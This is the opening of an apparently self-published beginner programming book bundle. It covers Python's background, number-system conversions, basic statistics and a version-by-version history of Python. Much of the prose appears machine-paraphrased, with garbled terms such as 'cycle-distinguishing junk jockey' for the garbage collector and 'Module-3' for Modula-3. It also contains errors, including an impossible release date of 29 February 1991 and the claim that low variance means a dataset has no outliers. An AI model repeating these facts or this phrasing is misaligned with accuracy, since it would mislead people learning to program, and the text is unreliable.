You are on page 1of 472

CODING

LANGUAGES

SQL, LINUX, PYTHON, MACHINE


LEARNING. THE STEP-BY-STEP
GUIDE FOR BEGINNERS TO
LEARN COMPUTER
PROGRAMMING IN A CRASH
COURSE
+ EXERCISES

JOHN S. CODE
© Copyright 2019 - All rights reserved.
The content contained within this book may not be reproduced,
duplicated or transmitted without direct written permission from
the author or the publisher.
Under no circumstances will any blame or legal responsibility be
held against the publisher, or author, for any damages, reparation,
or monetary loss due to the information contained within this book.
Either directly or indirectly.
Legal Notice:
This book is copyright protected. This book is only for personal
use. You cannot amend, distribute, sell, use, quote or paraphrase
any part, or the content within this book, without the consent of the
author or publisher.
Disclaimer Notice:
Please note the information contained within this document is for
educational and entertainment purposes only. All effort has been
executed to present accurate, up to date, and reliable, complete
information. No warranties of any kind are declared or implied.
Readers acknowledge that the author is not engaging in the
rendering of legal, financial, medical or professional advice. The
content within this book has been derived from various sources.
Please consult a licensed professional before attempting any
techniques outlined in this book.
By reading this document, the reader agrees that under no
circumstances is the author responsible for any losses, direct or
indirect, which are incurred as a result of the use of information
contained within this document, including, but not limited to, —
errors, omissions, or inaccuracies.
INTRODUTION
First of all I want to congratulate you for having purchased the
bundle on programming languages. This book is aimed at those
who approach programming and coding languages for the first
time and will take you to know the basics, approach the practice,
read important tips and advice on the most popular programming
languages. In these texts you will have the opportunity to know one
of the most innovative operating systems such as Linux, manage
and ordinary data with the well-known SQL language, learn to
write in coding and master it with Python and analyze big data with
the Machine Learning book by fully entering the world of
computer programming. You no longer need to feel left out at work
to have no idea of working with computer data, having a clearer
vision and starting to get serious about your future. The world is
moving forward with technologies and mastering programming
languages becomes more and more fundamental in work and for
your future in general. I wish you a good read and good luck for
this new adventure and for your future.
TABLE OF CONTENTS

1.
PYTHON PROGRAMMING FOR BEGINNERS:
A hands-on easy guide for beginners to learn Python programming fast,
coding language, Data analysis with tools and tricks.
John S. Code

2.
PYTHON MACHINE LEARNING:
THE ABSOLUTE BEGINNER’S GUIDE FOR UNDERSTAND NEURAL
NETWORK, ARTIFICIAL INTELLIGENT, DEEP LEARNING AND
MASTERING THE FUNDAMENTALS OF ML WITH PYTHON.
John S. Code

3.
LINUX FOR BEGINNERS:
THE PRACTICAL GUIDE TO LEARN LINUX OPERATING SYSTEM
WITH THE PROGRAMMING TOOLS FOR THE INSTALLATION,
CONFIGURATION AND COMMAND LINE + TIPS ABOUT HACKING
AND SECURITY.
John S. Code

4.
SQL COMPUTER PROGRAMMING FOR
BEGINNERS:
LEARN THE BASICS OF SQL PROGRAMMING WITH THIS STEP-BY-
STEP GUIDE IN A MOST EASILY AND COMPREHENSIVE WAY FOR
BEGINNERS INCLUDING PRACTICAL EXERCISE.
John S. Code
PYTHON PROGRAMMING FOR
BEGINNERS:
A HANDS-ON EASY GUIDE FOR
BEGINNERS TO LEARN PYTHON
PROGRAMMING FAST, CODING
LANGUAGE, DATA ANALYSIS
WITH TOOLS AND TRICKS.

JOHN S. CODE

© Copyright 2019 - All rights reserved.


The content contained within this book may not be reproduced,
duplicated or transmitted without direct written permission from
the author or the publisher.
Under no circumstances will any blame or legal responsibility be
held against the publisher, or author, for any damages, reparation,
or monetary loss due to the information contained within this book.
Either directly or indirectly.
Legal Notice:
This book is copyright protected. This book is only for personal
use. You cannot amend, distribute, sell, use, quote or paraphrase
any part, or the content within this book, without the consent of the
author or publisher.
Disclaimer Notice:
Please note the information contained within this document is for
educational and entertainment purposes only. All effort has been
executed to present accurate, up to date, and reliable, complete
information. No warranties of any kind are declared or implied.
Readers acknowledge that the author is not engaging in the
rendering of legal, financial, medical or professional advice. The
content within this book has been derived from various sources.
Please consult a licensed professional before attempting any
techniques outlined in this book.
By reading this document, the reader agrees that under no
circumstances is the author responsible for any losses, direct or
indirect, which are incurred as a result of the use of information
contained within this document, including, but not limited to, —
errors, omissions, or inaccuracies.

Table of Contents
Introduction
Chapter 1 Mathematical Concepts
Chapter 2 What Is Python
Chapter 3 Writing The First Python Program
Chapter 4 The Python Operators
Chapter 5 Basic Data Types In Python
Chapter 6 Data Analysis with Python
Chapter 7 Conditional Statements
Chapter 8 Loops – The Never-Ending Cycle
Chapter 9 File handling
Chapter 10 Exception Handling
Chapter 11 Tips and Tricks For Success
Conclusion
Introduction
Python is an awesome decision on machine learning for a few
reasons. Most importantly, it's a basic dialect at first glance.
Regardless of whether you're not acquainted with Python, getting
up to speed is snappy in the event that you at any point have
utilized some other dialect with C-like grammar.
Second, Python has an incredible network which results in great
documentation and inviting and extensive answers in Stack
Overflow (central!).
Third, coming from the colossal network, there are a lot of valuable
libraries for Python (both as "batteries
included" an outsider), which take care of essentially any issue that
you can have (counting machine learning).
History of Python
Python was invented in the later years of the 1980s. Guido van
Rossum, the founder, started using the language in December 1989.
He is Python's only known creator and his integral role in the
growth and development of the language has earned him the
nickname "Benevolent Dictator for Life". It was created to be the
successor to the language known as ABC.
The next version that was released was Python 2.0, in October of
the year 2000 and had significant upgrades and new highlights,
including a cycle- distinguishing junk jockey and back up support
for Unicode. It was most fortunate, that this particular version,
made vast improvement procedures to the language turned out to
be more straightforward and network sponsored.
Python 3.0, which initially started its existence as Py3K. This
version was rolled out in December of 2008 after a rigorous
testing period. This particular version of Python was hard to roll
back to previous compatible versions which are the most
unfortunate. Yet, a significant number of its real highlights have
been rolled back to versions 2.6 or 2.7 (Python), and rollouts
of Python 3 which utilizes the two to three utilities, that helps to
automate the interpretation of the Python script.
Python 2.7's expiry date was originally supposed to be back
in 2015, but for unidentifiable reasons, it was put off until the
year 2020. It was known that there was a major concern about data
being unable to roll back but roll FORWARD into the new version,
Python 3. In 2017, Google declared that there would be work
done on Python 2.7 to enhance execution under
simultaneously running tasks.
Basic features of Python
Python is an unmistakable and extremely robust programming
language that is object-oriented based almost identical to Ruby,
Perl, and Java, A portion of Python's remarkable highlights:

Python uses a rich structure, influencing, and


composing projects that can be analyzed simpler.
It accompanies a huge standard library that backs tons
of simple programming commands, for example,
extremely seamless web server connections,
processing and handling files, and the ability to search
through text with commonly used expressions and
commands.
Python's easy to use interactive interface makes it
simple to test shorter pieces of coding. It also comes
with IDLE which is a "development environment".
The Python programming language is one of many different types
of coding languages out there for you. Some are going to be suited
the best to help out with websites. There are those that help with
gaming or with specific projects that you want to handle. But when
it comes to finding a great general-purpose language, one that is
able to handle a lot of different tasks all at once, then the Python
coding language is the one for you.
There are a lot of different benefits to working with the Python
language. You will find that Python is easy enough for a beginner
to learn how to work with. It has a lot of power behind it, and there
is a community of programmers and developers who are going to
work with this language to help you find the answers that you are
looking for. These are just some of the benefits that we get to enjoy
with the Python language, and part of the reason why we will want
to get started with this language as soon as possible!
The Python programming language is a great general-purpose
language that is able to take care of all your computing and
programming needs. It is also freely available and can make
solving some of the bigger computer programs that you have as
easy as writing out some of the thoughts that you have about that
solution. You are able to write out the code once, and then, it is
able to run on almost any kind of program that you would like
without you needing to change up the program at all.
How is Python used?
Python is one of the best programming languages that is a general-
purpose and is able to be used on any of the modern operating
systems that you may have on your system. You will find that
Python has the capabilities of processing images, numbers, text,
scientific data, and a lot of other things that you would like to save
and use on your computer.
Python may seem like a simple coding language to work with, but
it has a lot of the power and more that you are looking for when it
is time to start with programming. In fact, many major businesses,
including YouTube, Google, and more, already use this coding
language to help them get started on more complex tasks.
Python is also known as a type of interpreted language. This means
that it is not going to be converted into code that is readable by the
computer before the program is run. Instead, this is only going to
happen at runtime. Python and other programming languages have
changed the meaning of this kind of coding and have ensured that it
is an accepted and widely used coding method for many of the
projects that you would like to handle.
There are a lot of different tasks that the Python language is able to
help you complete. Some of the different options that you are able
to work with include:

1. Programming any of the CGI that you need on your


web applications.
2. Learning how to build up your own RSS reader
3. Working with a variety of files.
4. Creating a calendar with the help of HTML
5. Being able to read from and write in MySQL
6. Being able to read from and write to PostgreSQL
The Benefits of Working with Python
When it comes to working with the Python language, you will find
that there are a lot of benefits with this kind of coding language. It
is able to help you to complete almost any kind of coding process
that you would like and can still have some of the ease of use that
you are looking for. Let’s take a quick look at some of the benefits
that come with this kind of coding language below:

Beginners can learn it quickly. If you have always


wanted to work with a coding language, but you have
been worried about how much work it is going to take,
or that it will be too hard for you to handle, then
Python is the best option. It is simple to use and has
been designed with the beginner in mind.
It has a lot of power to enjoy. Even though Python is
easy enough for a beginner to learn how to use, that
doesn’t mean that you are going to be limited to the
power that you are able to get with some of your
codings. You will find that the Python language has
the power and more that you need to get so many
projects done.
It can work with other coding languages. When we get
to work on data science and machine learning, you will
find that this is really important. There are some
projects where you will need to combine Python with
another language, and it is easier to do than you may
think!
It is perfect for simple projects all the way up to more
complex options like machine learning and data
analysis. This will help you to complete any project
that you would like.
There are a lot of extensions and libraries that come
with the Python language, which makes it the best
option for you to choose for all your projects. There
are a lot of libraries that you are able to add to Python
to make sure that it has the capabilities that you need.
There is a large community that comes with Python.
This community can answer your questions, show you
some of the different codes that you can work with,
and more. As a beginner, it is always a great idea to
work with some of these community members to
ensure that you are learning as much as possible about
Python.
When it comes to handling many of the codes and more that you
would like in your business or on other projects, nothing is going to
be better than working with the Python language. In this
guidebook, we will spend some time exploring the different aspects
of the Python language, and some of the different things that you
are able to do with this coding language as well.
Mathematical Concepts
As we have stated before, computers are physical manifestations of
several mathematical concepts. Mathematics are the scientific
language of solving problems. Over the centuries, mathematicians
have theoretically solved many complex issues. Mathematics
includes concepts like algebra and geometry.
Number Systems
Mathematics is a game of number manipulation which makes
number systems at the center stage of mathematical concepts.
There are several different types of number systems. Before we
take a look at the number systems, we have to understand the
concept of coding.
Coding
A way to represent values using symbols is called coding. Coding
is as old as humans. Before the number systems we use today, there
were other systems to represent values and messages. An example
of coding from ancient times is the Egyptian hieroglyphs.

Number systems are also examples of coding because values are


represented using special symbols.
There are different types of number systems, and we are going to
discuss a few relevant ones.
Binary System
A binary system has only two symbols, 1 and 0 which are referred
to as bits. All the numbers are represented by combining these two
symbols. Binary systems are ideal for electronic devices because
they also have only two states, on or off. In fact, all electronic
devices are based on the binary number system. The number
system is positional which means the position of symbols
determines the final value. Since there are two symbols in this
system, the system has a base of 2.
The sole purpose of input and output systems is to convert data to
and from binary system to a form that makes better sense to the
user. The first bit from the left side is called Most Significant Bit
(MSB) while the first bit from the right is called the Least
Significant Bit (LSB).
Here is the binary equivalent code of “this is a message”:
01110100 01101000 01101001 01110011 00100000 01101001
01110011 00100000 01100001 00100000 01101101 01100101
01110011 01110011 01100001 01100111 01100101
Decimal System
The decimal system has ten symbols, the numbers 0 through 9.
This is also a positional number system where the position of
symbols changes the value it represents. All the numbers in this
system are created with different combinations of the initial ten
symbols. This system has a base 10.
This is also called the Hindu-Arabic number system. Decimals
make more sense to humans and are used in daily life. There are
two reasons for that.
Creating large numbers from the base symbols follows a
consistent pattern
Performing arithmetic operations in a decimal system is
easier compared to other systems
Hexadecimal System
The hexadecimal number system is the only one that has letters as
symbols. It has the 10 symbols of the decimal system plus the six
alphabets A, B, C, D, E and F. This is also a positional number
system with a base 16.
Hexadecimal system is extensively used to code instructions in
assembly language.
Number System Conversion
We can convert the numbers from one system to another. There are
various online tools to do that. Python also offers number
conversion, but it is better to learn how it is done manually.
Binary to Decimal
Here’s a binary number 01101001, let’s convert it to a decimal
number.
( 01101001 )2 = 0 x 27 + 1 x 26 + 1 x 25 + 0 x 24 + 1 x 23 + 0 x 22 +
0 x 21 + 1 x 20
( 01101001 )2 = 0 + 64 + 32 + 0 + 8 + 0 + 0 + 1
( 01101001 )2 = ( 105 )10
Decimal to Binary
To convert a decimal number to binary, we have to repeatedly
divide the number by two until the quotient becomes one.
Recording the remainder generated at each division step gives us
the binary equivalent of the decimal number.

An interesting thing to note here is that ( 01101001 )2 and (


1101001 )2 represent the same decimal number ( 105 )10. It means
that just like decimal number system, leading zeros can be ignored
in the binary number system.
Binary to Hexadecimal
Binary numbers can be converted to hexadecimal equivalents using
two methods.

1. Convert the binary number to decimal, then decimal to


hexadecimal number
2. Break binary number in groups of four bits and convert
each to its hexadecimal equivalent, keeping the groups’
positions in the original binary number intact.
Let’s convert ( 1101001 )2 to a hexadecimal number using the
second method. The first step is to break the binary number into
different groups each of four bits. If the MSB group has less than
four bits, make it four by adding leading zeros. Grouping starts
from the LSB. So, ( 1101001 )2 will give us ( 1001 )2 and ( 0110 )2.
Now, remembering their position in the original binary number, we
are going to convert each group to a hexadecimal equivalent.
Here is the table of hexadecimal equivalents of four-bit binary
numbers.
Binary Hexadecimal
0000 0

0001 1
0010 2
0011 3
0100 4
0101 5
0110 6
0111 7

1000 8
1001 9
1010 A
1011 B
1100 C
1101 D
1110 E
1111 F

From the table, we can see ( 1001 )2 is ( 9 )16 and ( 0110 )2,the
MSB group, is ( 6 )16.
Therefore, ( 1101001 )2 = ( 01101001 )2 = ( 69 )16
Hexadecimal to binary
We can use the above given table to quickly convert hexadecimal
numbers to binary equivalents. Let’s convert ( 4EA9 )16 to binary.
( 4 )16 = ( 0100 )2
( E )16 = ( 1110 )2
( A )16 = ( 1010 )2
( 9 )16 = ( 1001 )2
So, ( 4EA9 )16 = ( 0100111010101001 )2 = ( 100111010101001 )2
Decimal to Hexadecimal
You can say hexadecimal is an extended version of decimals.
Let’s convert ( 45781 )10 to decimal. But, first, we have to
remember this table.
Decimal Hexadecimal
0 0
1 1
2 2
3 3

4 4
5 5
6 6
7 7

8 8
9 9
10 A
11 B
12 C
13 D
14 E

15 F

We are going to divide the decimal number repeatedly by 16 and


record the remainders. The final hexadecimal equivalent is formed
by replacing remainder decimals with their correct hexadecimal
symbols.
Hexadecimal to Decimal
Let’s convert ( 4EA9 )16 to its decimal equivalent.

( 4EA9 )16 = 4 x 163 + 14 x 162 + 10 x 161 + 9 x 160


( 4EA9 )16 = 16384 + 3584 + 160 + 9
( 4EA9 )16 = ( 20137 )10
There’s another number system, the octal system, where the
number of unique symbols include 0, 1, 2, 3, 4, 5, 6, along with 7.
These were developed for small scale devices that worked on small
values with limited resources. With the rapid advancements in
storage and other computer resources, octal system became
insufficient and thus was discarded in favor of hexadecimal number
system. You might still find an old octal based computer system.

Fractions (Floating Points)


Decimal number system supports a decimal point ‘.’ to represent
portion/slices of a value. For example, if we want to say half of
milk bag is empty using numbers, we can write 0.5 or ½ of milk
bag is empty. Do other number systems support decimal point?
Yes, they do. Let’s see how to convert ( 0.75 )10 or ( ¾ )10 to
binary.
¾ x 2 = 6/4 = 1 . ( 2/4 )
2/4 x 2 = 4/4 = 1
( 0.75 )10 = ( ¾ )10 = ( .11 )2
Negatives
In the decimal system, a dash or hyphen ‘-’ is placed before a
number to declare it as a negative. There are different ways to
denote negative numbers in the binary system. The easiest is to
consider the MSB as a sign bit, which means if MSB is 1, the
number is negative and if the MSB is 0, the number is positive.
Determining if a hexadecimal number is negative or positive is a
bit tricky. The easiest way is to convert the number into binary and
perform the checks for negatives in binary system.
Linear Algebra
Did you hate algebra in school? I have some bad news for you!
Linear algebra is heavily involved in programming because it’s one
of the best mathematical ways to solve problems. According to
Wikipedia, algebra is the study of mathematical symbols and the
rules for manipulating these symbols. The field advanced thanks to
the works of Muhammad ibn Musa al-Khwarizmi who introduced
the reduction and balancing methods and treated algebra as an
independent field of mathematics. During that era, the concept of
‘x’ and ‘y’ etc. variable notation wasn’t widespread but during the
Islamic Golden Age, Arabs had a fondness of lengthy “layman
terms” descriptions of problems and solutions and that is what
Khwarizmi explained algebra concepts in his book. The book dealt
with many practical real-life problems including the fields of
finance, planning, and legal.
So, we know what algebra is. But, where does “linear” comes
from? For that, we have to understand what a linear system is. It is
a mathematical model where the system attributes (variables) have
a linear relation among themselves. The easiest way to explain this
is if the plot between system attributes is a straight line, the system
is linear. Linear systems are much simpler than the nonlinear
systems. The set of algebraic concepts that relate to linear systems
is referred to as linear algebra. Linear algebra helps resolve system
problems such as missing attribute values. The first step is to create
linear equations to establish the relationship between the system
variables.

Statistics
Another important field of mathematics that is crucial in various
computer science applications. Data analysis and machine learning
wouldn’t be what they are without the advancements made in
statistical concepts during the 20th century. Let’s see some concepts
related to statistics.
Outlier
Outlier detection is very important in statistical analysis. It helps in
homogenizing the sample data. After detecting the outliers, what to
do with them is crucial because they directly affect the analysis
results. There are many possibilities including:
Discarding Outlier
Sometimes it’s better to discard outliers because they have been
recorded due to some error. This usually happens where the
behavior of the system is already known.
System Malfunction
But, outliers can also indicate a system malfunction. It is always
better to investigate the outliers instead of discarding them
straightaway.
Average
Finding the center of a data sample is crucial in statistical analysis
because it reveals a lot of system characteristics. There are different
types of averages, each signifying something important.
Mean
Mean is the most common average. All the data values are added
and divided by the number of data values added together. For
example, you sell shopping bags to a well-renowned grocery store
and they want to know how much each shopping bag can carry.
You completely fill 5 shopping bags with random grocery items
and weigh them. Here are the readings in pounds.
5.5, 6.0, 4.95, 7.1, 5.0
You calculate the mean as (5.5 + 6 + 4.95 + 7.1 + 5) / 5 = 5.71.
You can tell the grocery store your grocery bags hold 5.71 lbs on
average.
Median
Median is the center value with respect to the position of data in a
sample data when it’s sorted in ascending order. If sample data has
odd members, the median is the value with an equal number of
values on both flanks. If sample data has an even number of values,
the median is calculated by finding the mean of two values in the
middle with equal number of items on both sides.
Mode
Mode is the most recurring value in a dataset. If there is no
recurring value in the sample data, there is no mode.
Variance
To find how much each data value in a sample data changes with
respect to the average of the sample data, we calculate the variance.
Here is a general formula to calculate variance.
sum of (each data point - mean of sample points )2 / number of data
points in the sample.
If the variance is low in a sample data, it means there are no
outliers in the data.
Standard Deviation
We take the square root of variance to find standard deviation. This
relates the mean of sample data to the whole of sample data.
Probability
No one can accurately tell what will happen in the future. We can
only predict what is going to happen with some degree of certainty.
The probability of an event is written mathematically as,
Probability = number of possible ways an event can happen / total
number of possibilities
A few points:

1. Probability can never be negative


2. Probability ranges between one and zero
3. To calculate probability, we assume that the set of
events we are working with occur independently
without any interference.
Finding the probability of an event can change the probability of
something happening in a subsequent event. It depends upon how
we are interacting with the system to find event probabilities.
Distribution
There are many types of distributions. In this book, whenever we
talk about distribution, we refer to probability distribution unless
explicitly stated otherwise. Let’s take an example of flipping coins
and see what is the distribution of such events.
HHH
HHT
HTH
TTT
THH
HTT
THT
TTH
This is a very simple event with only a handful of possible
outcomes. We can easily determine the probability of different
outcomes. But, this is almost impossible in complex systems with
thousands or millions of possible outcomes. Distributions work
much better in such cases by visually representing the probability
curve. It makes more sense than looking at a huge table of fractions
or small decimal numbers.
We call a probability distribution discrete if we know all the
possible outcomes beforehand.
What Is Python
Python is going to be a programming language that is known as
interpreted, general-purpose, high-level, and multiparadigm.
Python is going to allow the programmers who use it some
different styles of programming in order to create simple or even
some complex programs, get quicker results than before, and write
out code almost as if they are speaking in a human language, rather
than like they are talking to a computer.
This language is so popular that you will find a lot of major
companies that are already using it for their systems, including
Google App Engine, Google Search, YouTube, iRobot machines
and more. And as the knowledge about this language continues to
increase, it is likely that we are going to see even more of the
applications and sites that we rely on each day working with this
language as well.
The initial development of Python was started by Guido van
Rossum in the late 1980s. Today, it is going to be developed and
run by the Python Software Foundation. Because of the features
behind this language, programmers of Python can accomplish their
tasks with many different styles of programming. Python can be
used for a variety of things as well including serial port access,
game development, numeric programming, and web development
to name a few.
There are going to be a few different attributes that we can look at
that show us why the development time that we see in Python is
going to be faster and more efficient than what we are seeing with
some of the other programming languages out there. These will
include:

1. Python is an interpreted language. This means that


there is no need for us to compile the code before we
try to execute the program because Python will not
need this compilation in the background. It is also
going to be a more high-level language that will
abstract many sophisticated details from the
programming code. Much of this abstraction is going
to be focused so that the code could be understood
even by those who are just getting started with coding.

2. Python codes are often going to be shorter than similar


codes in other languages. Although it does offer some
fast times for development, keep in mind that the
execution time is going to lag a little bit. Compared to
some of the other languages, such as fully compiling
options like C and C++< Python is going to execute at
a slower rate. Of course, with the processing speeds
that we see in most computers today, the differences in
the speed are not really going to be noticed by the
people who are using the system.
There are a lot of different things that we are able to do when it
comes to the Python language, and we are going to spend some
time looking at how we can do some of the different parts as well.
From some of the basics that we are able to do with the help of
Python all the way to some of the more complex things that we are
able to do with data science and machine learning that we can talk
about a little later.
And all of this can be done with the ease of the Python language.
You will find that when we spend some time focusing on this
language and some of the basics that we are able to do will help to
prepare us for some of the more complicated things that we are
able to do with this code as well.
A. WHY TO LEARN PYTHON
Learning the ABCs of anything in this world, is a must. Knowing
the essentials is winning half the battle before you get started. It’s
easier to proceed when you are equipped with the fundamentals of
what you are working on.
In the same manner that before you embark on the other aspects of
python let us level off the basic elements first. You need to learn
and understand the basics of python as a foundation in advancing to
the more complicated components. This fundamental information
will greatly help you as you go on and make the learning
experience easier and enjoyable.
Familiarize yourself with the Python Official Website
https://www.python.org/. Knowing well the website of python
would give you the leverage in acquiring more information and
scaling up your knowledge about python. Also, you can get the
needed links for your work
Learn from Python collections. Locate python collections such as
records, books, papers, files, documentations and archives and
learn from it. You can pick up a number of lessons from these, and
expand your knowledge about Python. There are also tutorials,
communities and forums at your disposal.
Possess the SEO Basics. Acquire some education on Search Engine
Optimization so you can interact with experts in the field and
improve your python level of knowledge. That being said, here are
the basic elements of Python.
B. DIFFERENT VERSIONS OF PYTHON
With Guido van Rossum at the helm of affairs, Python has witness
three versions over the years since its conception in the '80s. These
versions represent the growth, development, and evolution of the
scripting language over time, and cannot be done without in telling
the history of Python.
The Versions of Python Include The Following;
• Python 0.9.0:
The first-ever version of Python released following its
implementation and in-house releases at the Centrum Wiskunde
and Informatica (CWI) between the years 1989 and 1990, was
tagged version 0.9.0. This early version which was released on alt.
sources had features such as exception handling, functions, and
classes with inheritance, as well as the core data types of list, str,
dict, among others in its development. The first release came with a
module system obtained from Module-3, which Van Rossum
defined as one of the central programming units used in the
development of Python.
Another similarity the first release bore with Module-3 is found in
the exception model which comes with an added else clause. With
the public release of this early version came a flurry of users which
culminated in the formation of a primary discussion forum for
Python in 1994. The group was named comp. lang. python and
served as a milestone for the growing popularity of Python users.
Following the release of the first version in the 29th of February,
1991, there were seven other updates made to the early version
0.9.0. These updates took varying tags under the 0.9.0 version and
were spread out over nearly three years (1991 to 1993). The first
version update came in the form of Python 0.9.1, which was
released in the same month of February 1991 as its predecessor.
The next update came in the autumn period of the release year,
under the label Python 0.9.2. By Christmas Eve of the same year
(1991) python published its third update to the earliest version
under the label Python 0.9.4. By January of the succeeding year,
the 2nd precisely, a gift update under the label Python 0.9.5 was
released. By the 6th of April, 1992, a sixth update followed named,
Python 0.9.6. It wasn't until the next year, 1993, that a seventh
update was released under the tag Python 0.9.8. The eighth and
final update to the earliest version came five months after the
seventh, on the 29th of July, 1993, and was dubbed python 0.9.9.
These updates marked the first generation of python development
before it transcended into the next version label.

• Python 1.0
After the last update to Python 0.9.0, a new version, Python 1.0,
was released in January of the following year. 1994 marked the
addition of key new features to the Python programming language.
Functional programming tools such as map, reduce, filter, and
lambda were part of the new features of the version 1 release. Van
Rossum mentioned that the obtainment of map, lambda, reduce and
filter was made possible by a LISP hacker who missed them and
submitted patches that worked. Van Rossum's contract with CWI
came to an end with the release of the first update version 1.2 on
the 10th of April, 1995. In the same year, Van Rossum went on to
join CNRI (Corporation for National Research Initiatives) in
Reston, Virginia, United States, where he continued to work on
Python and published different version updates.
Nearly six months following the first version update, version 1.3
was released on the 12th of October, 1995. The third update,
version 1.4, came almost a year later in October of 1996. By then,
Python had developed numerous added features. Some of the
typical new features included an inbuilt support system for
complex numbers and keyword arguments which, although
inspired by Modula-3, shared a bit of a likeness to the keyword
arguments of Common Lisp. Another included feature was a
simple form hiding data through name mangling, although it could
be easily bypassed.
It was during his days at CNRI that Van Rossum began the CP4E
(Computer Programming for Everybody) program which was
aimed at making more people get easy access to programming by
engaging in simple literacy of programming languages. Python was
a pivotal element to van Rossum's campaign, and owing to its
concentration on clean forms of syntax; Python was an already
suitable programming language. Also, since the goals of ABC and
CP4E were quite similar, there was no hassle putting Python to use.
The program was pitched to and funded by DARPA, although it
did become inactive in 2007 after running for eight years.
However, Python still tries to be relatively easy to learn by not
being too arcane in its semantics and syntax, although no priority is
made of reaching out to non-programmers again.
The year 2000 marked another significant step in the development
of Python when the python core development team switched to a
new platform — BeOpen where a new group, BeOpen PythonLabs
team was formed. At the request of CNRI, a new version update
1.6 was released on the 5th of September, succeeding the fourth
version update (Python 1.5) on the December of 1997. This update
marked the complete cycle of development for the programming
language at CNRI because the development team left shortly
afterward. This change affected the timelines of release for the new
version Python 2.0 and the version 1.6 update; causing them to
clash. It was only a question of time before Van Rossum, and his
crew of PythonLabs developers switched to Digital Creations, with
Python 2.0 as the only version ever released by BeOpen.
With the version 1.6 release caught between a switch of platforms,
it didn't take long for CNRI to include a license in the version
release of Python 1.6. The license contained in the release was
quite more prolonged than the previously used CWI license, and it
featured a clause mentioning that the license was under the
protection of the laws applicable to the State of Virginia. This
intervention sparked a legal feud which led The Free Software
Foundation into a debate regarding the "choice-of-law" clause
being incongruous with that if the GNU General Public License. At
this point, there was a call to negotiations between FSF, CNRI, and
BeOoen regarding changing to Python's free software license
which would serve to make it compatible with GPL. The
negotiation process resulted in the release of another version update
under the name of Python 1.6.1. This new version was no different
from its predecessor in any way asides a few new bug fixes and the
newly added GPL-compatible license.
• Python 2.0:
After the many legal dramas surrounding the release of the second-
generation Python 1.0 which corroborated into the release of an
unplanned update (version 1.6.1), Python was keen to put all
behind and forge ahead. So, in October of 2000, Python 2.0 was
released. The new release featured new additions such as list
comprehensions which were obtained from other functional
programming languages Haskell and SETL. The syntax of this
latest version was akin to that found in Haskell, but different in that
Haskell used punctuation characters while Python stuck to
alphabetic keywords.
Python 2.0 also featured a garbage collection system which was
able to collect close reference cycles. A version update (Python
2.1) quickly followed the release of Python 2.0, as did Python
1.6.1. However, due to the legal issue over licensing, Python
renamed the license on the new release to Python Software
Foundation License. As such, every new specification, code or
documentation added from the release of version update 2.1 was
owned and protected by the PSF (Python Software Foundation)
which was a nonprofit organization created in the year 2001. The
organization was designed similarly to the Apache Software
Foundation. The release of version 2.1 came with changes made to
the language specifications, allowing support of nested scopes such
as other statically scoped languages. However, this feature was, by
default, not in use and unrequired until the release of the next
update, version 2.2 on the 21st of December, 2001.
Python 2.2 came with a significant innovation of its own in the
form of a unification of all Python's types and classes. The
unification process merged the types coded in C and the classes
coded in Python into a single hierarchy. The unification process
caused Python's object model to remain totally and continuously
object-oriented. Another significant innovation was the addition of
generators as inspired by Icon. Two years after the release of
version 2.2, version 2.3 was published in July of 2003. It was
nearly another two years before version 2.4 was released on the
30th of November in 2004. Version 2.5 came less than a year after
Python 2.4, in September of 2006. This version introduced a "with"
statement containing a code block in a context manager; as in
obtaining a lock before running the code block and releasing the
lock after that or opening and closing a file. The block of code
made for behavior similar to RAII (Resource Acquisition Is
Initialization) and swapped the typical "try" or "finally" idiom.
The release of version 2.6 on the 1st of October, 2008 was
strategically scheduled such that it coincided with the release of
Python 3.0. Asides the proximity in release date, version 2.6 also
had some new features like the "warnings" mode which outlined
the use of elements which had been omitted from Python 3.0.
Subsequently, in July of 2010, another update to Python 2.0 was
released in the version of python 2.7. The new version updates
shared features and coincided in release with version 3.1 — the
first version update of python 3. At this time, Python drew an end
to the release of Parallel 2.x and 3.x, making python 2.7 the last
version update of the 2.x series. Python went public in 2014,
November precisely, to announce to its username that the
availability of python 2.7 would stretch until 2020. However, users
were advised to switch to python 3 in their earliest convenience.
• Python 3.0:
The fourth generation of Python, Python 3.0, otherwise known as
Py3K and python 3000, was published on the 3rd of December
2008. This version was designed to fix the fundamental flaws in the
design system of the scripting language. A new version number had
to be made to implement the required changes which could not be
run while keeping the stock compatibility of the 2.x series that was
by this time redundant. The guiding rule for the creation of python
3 was to limit the duplication of features by taking out old formats
of processing stuff. Otherwise, Python three still followed the
philosophy with which the previous versions were made. Albeit, as
Python had evolved to accumulate new but redundant ways of
programming alike tasks, python 3.0 was emphatically targeted at
quelling duplicative modules and constructs in keeping with the
philosophy of making one "and
preferably only one" apparent way of doing things. Regardless of
these changes, though, version 3.0 maintained a multi-paradigm
language, even though it didn't share compatibility with its
predecessor.
The lack of compatibility meant Python 2.0 codes were unable to
be run on python 3.0 without proper modifications. The dynamic
typing used in Python as well as the intention to change the
semantics of specific methods of dictionaries, for instance, made a
perfect mechanical conversion from the 2.x series to version 3.0
very challenging. A tool, name of 2to3, was created to handle the
parts of translation which could be automatically done. It carried
out its tasks quite successfully, even though an early review stated
that the tool was incapable of handling certain aspects of the
conversion process. Proceeding the release of version 3.0, projects
that required compatible with both the 2.x and 3.x series were
advised to be given a singular base for the 2.x series. The 3.x series
platform, on the other hand, was to produce releases via the 2to3
tool.
For a long time, editing the Python 3.0 codes were forbidden
because they required being run on the 2.x series. However, now, it
is no longer necessary. The reason being that in 2012, the
recommended method was to create a single code base which could
run under the 2.x and 3.x series through compatibility modules.
Between the December of 2008 and July 2019, 8 version updates
have been published under the python 3.x series. The current
version as at the 8th of July 2019 is the Python 3.7.4. Within this
timeframe, many updates have been made to the programming
language, involving the addition of new features mentioned below:

1. Print which used to be a statement was changed to an


inbuilt function, making it relatively easier to swap out
a module in utilizing different print functions as well as
regularizing the syntax. In the late versions of the 2.x
series, (python 2.6 and 2.7), print is introduced as
inbuilt, but is concealed by a syntax of the print
statement which is capable of being disabled by
entering the following line of code into the top of the
file: from__future__import print_function
2. The [input] function in the Python 2.x series was
removed, and the [raw_input] function to [input] was
renamed. The change was such that the [input] function
of Python 3 behaves similarly to the [raw_input]
function of the python 2.x series; meaning input is
typically outputted in the form of strings instead of
being evaluated as a single expression.
3. [reduce] was removed with the exemption of [map]
and [filter] from the in-built namespace into
[functools]. The reason behind this change is that
operations involving [reduce] are better expressed with
the use of an accumulation loop.
4. Added support was provided for optional function
annotations which could be used in informal type
declarations as well as other purposes.
5. The [str]/[unicode] types were unified, texts
represented, and immutable bytes type were introduced
